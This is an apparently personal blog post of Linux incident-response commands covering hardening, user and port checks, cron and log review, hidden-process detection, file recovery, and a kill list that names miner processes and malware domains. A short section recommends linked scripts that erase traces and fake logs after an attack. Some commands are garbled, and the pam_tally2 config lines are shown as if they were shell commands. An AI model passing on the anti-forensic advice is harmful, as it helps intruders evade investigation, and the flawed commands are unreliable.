Linux Security Response
TyeYeah Lv4

Learn how to master Linux commands, the Security Response will be a good entry cz it involves many Linux commands related to user management, privilege control, and task monitoring which are useful when using Linux

Linux Reinforce

1
2
3
4
5
6
7
8
$ chattr +a xxx	--only appendable
$ chattr +i xxx --cannot be deleted
$ touch /etc/nologin --normal user cannot login
$ vi /etc/ssh/sshd_config -> banner NONE --hide banner info
$ authconfig --passalgo=sha512 --update --replace md5 with SHA512
$ auth required pam_tally2.so deny=3 unlock_time=5
$ even_deny_root root_unlock_time=120 --limit login times (lock 2mins every 3 logins)
$ vi /etc/profile -> HISTSIZE=5 HISTFILESIZE=20

Security Response

  • PDCERF: Perparation, Detection, Containment, Eradication, Recovery, Follow-up
  • Confirm attacking time, IP address, and the evil file (process or rootkit) last

check suspicious users

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
# search privileged users
$ awk -F: '$3==0{print $1}' /etc/passwd
$ grep :0 /etc/passwd
# search users able to login remotely
$ awk '/\$1|\$6/{print $1}' /etc/shadow
# search users with sudo privilege
$ more /etc/sudoers | grep -v "^#\|^$" | grep "ALL=(ALL)"
# disable or delete users
usermod -L user unable to login
userdel user delete user
userdel -r user delete user and his homedir

# check new users
$ less /etc/passwd
# check last time of modification
$ ll -l /etc/passwd

port and process

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# netstat used for port info
# ps used for process info
# lsof used for connection info between process and port
$ netstat -antlp|more
$ netstat -pantu|grep port
$ ps aux[f]|grep pid
$ ps -p port
$ lsof [-i] |grep port
$ lsof -i :port
$ lsof -p pid

# ss used for port info
# fuser used for process info
$ ss [-t] |grep port
$ ss -pantul
$ sudo apt install psmisc # install fuser
$ sudo fuser -v port/protocol # like 80/tcp

startup item and timed tasks

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
$ more /etc/rc.local
$ more /etc/rc.d/rc[0~6].d

$ crontab -l # list cron services
$ crontab -e # edit
$ crontab -r # remove
/var/spool/cron/user default crontab filedir

suspicious dirs:
/var/spool/cron/*
/etc/crontab
/etc/cron.d/*
/etc/cron.daily/*
/etc/cron.hourly/*
/etc/cron.monthly/*
/etc/cron.weekly/
/etc/anacrontab
/var/spool/anacron/*

used to be:
$ chkconfig --list
$ chkconfig –-level 2345 httpd on/off
now is:
$ systemctl list-unit-files
$ systemctl enable httpd
$ systemctl disable httpd

log check

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# locate IP which brute force root password:     
$ journalctl -xa|grep "Failed password for root" | awk '{print $11}' | sort | uniq -c | sort -nr | more

# similar to above:
$ journalctl -xa|grep "Failed password"|grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"|uniq -c

# brute force password dict is:
$ grep "Failed password" /var/log/secure|perl -e 'while($_=<>){ /for(.*?) from/; print "$1\n";}'|uniq -c|sort -nr

# success logins IP:
$ grep "Accepted " /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr | more

# similar to above:
$ grep "Accepted " /var/log/secure | awk '{print $1,$2,$3,$9,$11}'

and as you can see, both /var/log/auth.log(replace the /vat/log/secure) and the command “journalctl -xa”, can be used to check logs

  • add user log e.g.
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    Jul 10 00:12:15 localhost useradd[2382]: new group: name=user, GID=1001
    Jul 10 00:12:15 localhost useradd[2382]: new user: name=user, UID=1001, GID=1001, home=/home/user
    , shell=/bin/bash
    Jul 10 00:12:58 localhost passwd: pam_unix(passwd:chauthtok): password changed for user
    #grep "useradd" /var/log/auth.log
    ​```
    - delete user log e.g.
    ```bash
    Jul 10 00:14:17 localhost userdel[2393]: delete user 'user'
    Jul 10 00:14:17 localhost userdel[2393]: removed group 'user' owned by 'user'
    Jul 10 00:14:17 localhost userdel[2393]: removed shadow group 'user' owned by 'user'
    # grep "userdel" /var/log/auth.log
    ​```
    - su switch user log e.g.
    ```bash
    Jul 10 00:38:13 localhost su: pam_unix(su-l:session): session opened for user good by root(uid=0)

view hidden processes

1
2
3
$ ps -ef | awk'{print $2}'|sort -n| uniq > tasklist1.txt
$ ls /proc | sort -n | uniq > tasklist2.txt
$ diff tasklist1.txt tasklist2.txt

Commands Summary

Files Recovery

if an important file were deleted, while a process which opens this file is alive, this process can still be read or written through it’s file descriptor.

e.g.

  • see /var/log/secure, only to find it was deleted
    pic 1

  • use “lsof” to see process that opens it
    pic 2

  • as we can see, pid is 1264, and fd (file descriptor) is 4. so we can find info in /proc/1264/fd/4
    pic 3

  • use I/O redirection to redirect it to file
    pic 4

  • see /var/log/secure, and now we recovered the deleted file
    pic 5

Tools

The ext3grep is to recovery file deleted by rm - rf on ext3 disk.
First unmount that disk to stop writting, and then install ext3grep. You can find it in apt repo, or compile it on your own.

Installation:

1
2
3
4
$ apt install e2fslibs-dev
$ tar xvf ext3grep-0.10.1.tar.gz
$ cd ext3grep-0.10.1
$ ./configuremake && make install

Scan file name:

1
$ ext3grep /dev/sdbx --dump-names

And recover all:

1
$ ext3grep /dev/sdbx --restore-all

Or recover someone:

1
$ ext3grep /dev/sdbx --restore-file var/lib/mysql/aqsh/tb_b_attench.MYD

Another tool is extundelete, you can install it through apt or get it on sourceforge.

Installation:

1
2
3
4
5
6
7
8
9
$ wget http://nchc.dl.sourceforge.net/project/extundelete/extundelete/0.2.4/extundelete-0.2.4.tar.bz2 
$ apt install e2fsprogs e2fslibs-dev build-essential
$ tar -jxvf extundelete-0.2.4.tar.bz2
$ cd extundelete-0.2.4
$ ./configure --prefix=/usr/local/extundelete
$ make && make install
# check installation
$ cd /usr/local/extundelete/bin
$ ./extundelete -v

The usage of it is similar to ext3grep, and it can recover by directory

1
2
3
4
5
6
7
$ ./extundelete --restore-file var/lib/mysql/aqsh/tb_b_attench.MYD /dev/sdbx  
$ ./extundelete --restore-all /dev/sdbx
$ date -d "May 7 18:40 2019" +%s
1557225600
$ ./extundelete --restore-all --after "1557225600" /dev/sdbx
# by directory
$ extundelete /dev/sdbx --restore-directory var/lib/mysql/aqsh

Useful Scripts

Normal

get busybox to analysis

1
2
3
$ cd /bin/
$ wget https://busybox.net/downloads/binaries/1.30.0-i686/busybox
$ chmod 755 busybox

show malicious processes

1
$ perf top -s pid,comm,dso,symbol

delete ddos trojans or mining scripts, can be used directly(from a SRC event)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
ps auxf | grep -v grep | grep hwlh3wlh44lh | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /usr/bin/.sshd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /usr/bin/bsd-port | awk '{print $2}' | xargs kill -9
ps auxf|grep -v grep|grep "xmr" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xig" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "ddgs" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "qW3xT" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "wnTKYg" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "t00ls.ru" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "sustes" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "thisxxs" | awk '{print $2}' | xargs kill -9
ps auxf|grep -v grep|grep "hashfish" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "kworkerds" | awk '{print $2}'|xargs kill -9

Operations related:

find zombie process

1
$ ps -ef | grep defunct

count

1
2
3
4
5
6
# simply use the top to see things like ...
...
Tasks: 4 total, 1 running, 3 sleeping, 0 stopped, 0 zombie
...
# or
ps -ef | grep defunct | grep -v grep | wc -l

kill zombie process

1
2
$ ps -e -o ppid,stat | grep Z | cut –d" " -f2 | xargs kill -9
$ kill -HUP `ps -A -ostat,ppid | grep -e '^[Zz]' | awk '{print $2}'`

Tide sec team’s auto script( in Chinese)

It is an automatic script written in pithon2, and is useful in linux security response.
It gather system information and service log, then generate a log file to save results.
This script can be found Here

A miner cleaner

This was extracted from a mining trojan, to get rid of every competitors on the victim.
Get it Here to clear mainstream mining trojans.

Clean your ass finally

After the attack, you better get your ass cleaned to be untraceable.
We have a simple cleaner Here. Another better script is Here in Chinese, which could even fake log info.

Key Files

“Key” here means important

Use lsattr to see hidden attribution

  • About hidden attribution
    1
    2
    3
    4
    5
    6
    7
    8

    -a  show all files and directories including .(current dir) and ..(parent dir)
    -d  show dirs' names
    -l  just list
    -R  Recursive processing, which processes all files and subdirectories in the specified directory together.
    -v  show versions of files and dirs
    -V  show versions

    Use getfacl to see things about ACL (Access Control List)
  • About ACL attribution
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    -a, --access: only displays file access control lists
    -d, --default: only displays the default access control list
    -c, --omit-header: not display comment headers
    -e, --all-effective: show all valid permissions
    -E, --no-effective: show invalid permissions
    -s, --skip-base: skip files with only base entries
    -R, --recursive: recursively display subdirs
    -L, --logical: logical traversal (follow the symbolic link)
    -P, --physical: physical traversal (does not follow symbolic links)
    -t, --tabular: Use tab-delimited output format
    -n, --numeric: show the user/group ID of the number
    -p, --absolute-names: not remove the '/' symbol before the path
    -v, --version: display version and exit
    -h, --help: display this help information

    Tools

  • chkrootkit
    later…
  • rkhunter
    later…
  • clamav
    later…
Powered by Hexo & Theme Keep
Total words 135.7k